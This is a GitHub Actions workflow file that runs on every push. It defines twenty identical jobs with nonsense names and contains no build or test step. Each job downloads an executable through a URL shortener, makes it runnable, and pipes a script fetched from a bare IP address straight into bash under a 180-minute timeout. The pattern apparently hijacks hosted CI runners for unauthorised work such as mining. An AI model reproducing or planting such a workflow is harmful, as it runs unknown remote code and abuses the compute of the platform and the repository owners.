name: wuxoso
on: push
jobs:
  solilata:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  fejisa:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  fabana:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  xeropixo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  mosuki:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  zafoli:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  pexahiki:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  rimojoma:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  xudonene:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  pipaco:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  guweke:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  ninepe:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  kupehu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  luhure:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  relacu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  gesiza:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  donuko:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  tacesu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  nafome:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
  tezoku:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=vuhabe | bash -
